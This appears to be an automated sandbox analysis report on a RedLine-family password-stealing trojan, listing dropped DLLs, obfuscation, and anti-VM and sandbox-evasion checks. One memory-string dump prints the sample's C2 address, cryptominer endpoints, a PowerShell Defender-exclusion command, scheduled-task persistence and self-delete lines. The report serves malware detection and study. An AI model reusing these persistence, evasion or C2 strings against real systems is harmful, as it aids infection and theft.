Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2050716572.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source:	Binary string: C:\Users\Tommy\Documents\GitHub\Font-Awesome-WPF\src\WPF\FontAwesome.WPF\bin\Signed-Net40\FontAwesome.WPF.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.Linq.2015\Release\System.Data.SQLite.Linq.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: D:\JenkinsWorkspaces\trebuchet-stage-release\AWSDotNetPublic\sdk\src\Services\CloudWatch\obj\AWSSDK.CloudWatch.Net45\Release\net45\AWSSDK.CloudWatch.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: /_/src/Autofac/obj/Release/netstandard2.0/Autofac.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: /_/src/Autofac/obj/Release/netstandard2.0/Autofac.pdbSHA256@ source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.2015\Release\System.Data.SQLite.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.2015\Release\System.Data.SQLite.pdb\ source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.EF6.2015\Release\System.Data.SQLite.EF6.pdbH source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source:	Binary string: /home/tmds/repos/Tmds.DBus/src/Tmds.DBus/obj/Release/netstandard2.0/Tmds.DBus.pdbSHA256$ source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.3.dr
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2050716572.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source:	Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.EF6.2015\Release\System.Data.SQLite.EF6.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: D:\JenkinsWorkspaces\trebuchet-stage-release\AWSDotNetPublic\sdk\src\Services\CloudWatch\obj\AWSSDK.CloudWatch.Net45\Release\net45\AWSSDK.CloudWatch.pdbSHA256 source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: /home/tmds/repos/Tmds.DBus/src/Tmds.DBus/obj/Release/netstandard2.0/Tmds.DBus.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\ProgramData\CAFIJKFHIJ.exe

Unpacked PE file: 9.2.CAFIJKFHIJ.exe.d00000.0.unpack .text:ER;.rsrc:R; vs Unknown_Section0:ER;Unknown_Section1:R;

Binary contains a suspicious time stamp

Source: CAFIJKFHIJ.exe.3.dr

Static PE information: 0x96C89C2F [Tue Mar 1 06:39:43 2050 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_004185A0

PE file contains sections with non-standard names

Source: softokn3.dll.3.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.3.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.3.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.3.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.3.dr	Static PE information: section name: .didat
Source: sqln[1].dll.3.dr	Static PE information: section name: .00cfg
Source: nss3.dll.3.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.3.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F9490D push ecx; ret	0_2_00F94920
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F61A80 push ecx; ret	0_2_00F61A93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041A4E5 push ecx; ret	3_2_0041A4F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C82B536 push ecx; ret	3_2_6C82B549
Source: C:\ProgramData\CAFIJKFHIJ.exe	Code function: 9_2_00007FFD9BAB1FAA pushfd ; ret	9_2_00007FFD9BAB1FB0
Source: C:\ProgramData\CAFIJKFHIJ.exe	Code function: 9_2_00007FFD9BAB8A21 push es; iretd	9_2_00007FFD9BAB8A24
Source: C:\ProgramData\CAFIJKFHIJ.exe	Code function: 9_2_00007FFD9BAB1D85 pushfd ; ret	9_2_00007FFD9BAB1D8B
Source: C:\ProgramData\CAFIJKFHIJ.exe	Code function: 9_2_00007FFD9BAB8DD8 push edx; retf	9_2_00007FFD9BAB8DDB
Source: C:\ProgramData\CAFIJKFHIJ.exe	Code function: 9_2_00007FFD9BAB113D pushfd ; ret	9_2_00007FFD9BAB1143
Source: C:\ProgramData\CAFIJKFHIJ.exe	Code function: 9_2_00007FFD9BBF3D44 push ebx; ret	9_2_00007FFD9BBF3D4E

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\CAFIJKFHIJ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Soft123[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\CAFIJKFHIJ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_004185A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CAFIJKFHIJ.exe PID: 5744, type: MEMORYSTR

High number of junk calls founds (likely related to sandbox DOS / API hammering)

Source: Global behavior

Junk call stats: NtWriteFile 2314752

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\ProgramData\CAFIJKFHIJ.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PortConnector WHERE PNPDeviceID IS NOT NULL
Source: C:\ProgramData\CAFIJKFHIJ.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PortConnector WHERE PNPDeviceID IS NOT NULL

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\ProgramData\CAFIJKFHIJ.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, RegAsm.exe, CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, RegAsm.exe	Binary or memory string: API_LOG.DLL
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLLCMDVRT32.DLLCMDVRT64.DLLSXIN.DLLCUCKOOMON.DLLKERNEL32.DLLWINE_GET_UNIX_FILE_NAMESELECT * FROM WIN32_COMPUTERSYSTEMMANUFACTURERMODELMICROSOFT CORPORATIONVIRTUALVMWAREBALLOON.NETKVM.VIOINPUTVIOFS.VIOSER.VMBUSVMBUSHIDHYPERKBDJOHN DOEMILLERMALWARECURRENTUSERSANDBOXJOHNSONWDAGUTILITYACCOUNTVBOXMOUSE.VBOXGUEST.VBOXSF.VBOXVIDEO.VMMOUSE.VBOXOGL.DLLVMWAREORACLEVIRTUALBOX GUEST ADDITIONSVBOXSERVICEVGAUTHSERVICEVMUSRVCQEMU-GASELECT FROM WIN32_PORTCONNECTOR WHERE PNPDEVICEID IS NOT NULLPNPDEVICEIDACPI\PNP0501ACPI\PNP0502SYSCRITICAL ERROR1POWERSHELLRUNAS -COMMAND ADD-MPPREFERENCE -EXCLUSIONPATH '{0}'ON0\SCREEN.JPGSCREEN\.JPGHASHCUM/GET.PHPPOST15SEC30SECRANDOM/ZIMA.PHP?MINE=IFELSEXMRVERUSXMR+VERUSRAVENETCVERUS+RAVENVERUS+ETCXMR+RAVENXMR+ETCAUTOABCDEFGHJKLMNOWIN32_PROCESSORPROCESSORID-WIN32_BIOSSERIALNUMBERWIN32_DISKDRIVESIGNATUREWIN32_BASEBOARDWIN32_VIDEOCONTROLLERNAMEX20X0000100X0000110X0000120X0000130X0000140X0000150X0000160X0000170X0000180X0000190X0000200X0000210X000022SELECT * FROM WIN32_PROCESSORNUMBEROFCORESPHORMMID.CROOT\CIMV2SELECT NAME FROM WIN32_PROCESSORUNKNOWN.SELECT TOTALPHYSICALMEMORY FROM WIN32_COMPUTERSYSTEMTOTALPHYSICALMEMORYMBSELECT * FROM WIN32_VIDEOCONTROLLERADAPTERRAM BYTES, CAPTION{0} \| {1}AMDNVIDIAINTEL(R){1}.ROOT\SECURITYCENTERROOT\SECURITYCENTER2SELECT * FROM ANTIVIRUSPRODUCTDISPLAYNAME, NONECPUGPURAMTAGIFELSELDAV/BEEP.PHPFILEZIDBEBRIK.PHP.BAT@ECHO OFFTIMEOUT 3 > NULSTART "" ""CD DEL "" /F /QSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\C2NODGFZA3MUZXHL/CREATE /SC MINUTE /MO 3 /TN "" /TR "" /FCMD/C SCHTASKS /CREATE /F /SC MINUTE /MO 5 /RL HIGHEST /TN "/ZIMA.PHP?MINE=LOADER;YESNOSELECT COMMANDLINE FROM WIN32_PROCESS WHERE PROCESSID = COMMANDLINEWIN64UNINSTALL.DATMAZRICY9X3PTU2IZDRO5UXBB6/AK0/HTSOSORRY.PHPEOK.PHPTOKYO.PHPCHECK.PHPOPERAAPP.DATOPERA.DATOPERAUPDATER.DATFIREFOX.DATHELPER.DATZUHAN.EXEWINFORM.CSZUHAN1264417905PROGRAM.CSGETIQZUTSZDJUKE1BSBET3EI2ENPPHHTXRWHVRLTV+QQKRJFXZ5YF6S4CCPXUXRE4GSEXBURQY1IXBJM+H+NKKUXWDRKMSHJJWZCKO9RYTWZ/5ZDYLRQZYZKU1AQMYRJIIC5E1EA04PVRZRO/7AHRKIZQ==YBM4NNGEQQFUIWZVANWG2OKZNBNG1PG7S41+NKV0IE1YLNNXKNDZWHC9OQR3X989TOJKAX+VQZ8J9MEC90WKEDP6JF6K5I0KUS3KC3P7W5HWUIY2VYBMXLVQVOXY4HZSKF6RSY8EDB9JVHITI1OGEBE7LPINPVDCPLNO7BA9H4PUEE1OMVXIBOAXODMCNZYXH2WBLTMBMLYZIYRYS2X1W2SHQJV9MELHOEXPN0WVWTZPMNWFIT4ESVD8KBOQVN+CWZ8WPHFKNLDOXZ9XAOAXJ/WKFJNCKYYTKCLPPN6MQON47QFU6FNCRFJL0WKAJUBTHW2JI1/J5UQNJL+XNNJZXLROMYC3PN0HG+S0I2F7Y4WHXX4HTFFK4TLIGGE9IEHVQFUTXCXGEKIPB3QA29LGSG==[CHECK]HTTP://185.209.162.40/APOCALYPSERUSSIA,GEORGIA,BELARUS,ARMENIA,RUSSIA,BELARUS,AZERBAIJAN,KAZAKHSTAN,KYRGYZSTAN,ARMENIA,UZBEKISTAN,TAJIKISTAN EF+UVD02PT3LWIEMBAG5OW==ONVBC.EXE/ZIMA.PHP?MINE=XMR/ZIMA.PHP?MINE=OTHERGENERATORGENAPZXDATID=APPLICATION/X-WWW-FORM-URLENCODED//REGSVCS.EXE/ZIMA.PHP?MINE=RAVENNGEN.EXE/ZIMA.PHP?MINE=ETC
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\ProgramData\CAFIJKFHIJ.exe	Memory allocated: 18D0000 memory reserve \| memory write watch			Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Memory allocated: 1C450000 memory reserve \| memory write watch			Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\ProgramData\CAFIJKFHIJ.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API coverage: 8.6 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\ProgramData\CAFIJKFHIJ.exe TID: 2488	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 3220	Thread sleep count: 43 > 30			Jump to behavior

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\ProgramData\CAFIJKFHIJ.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410370 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 004104A2h

3_2_00410370

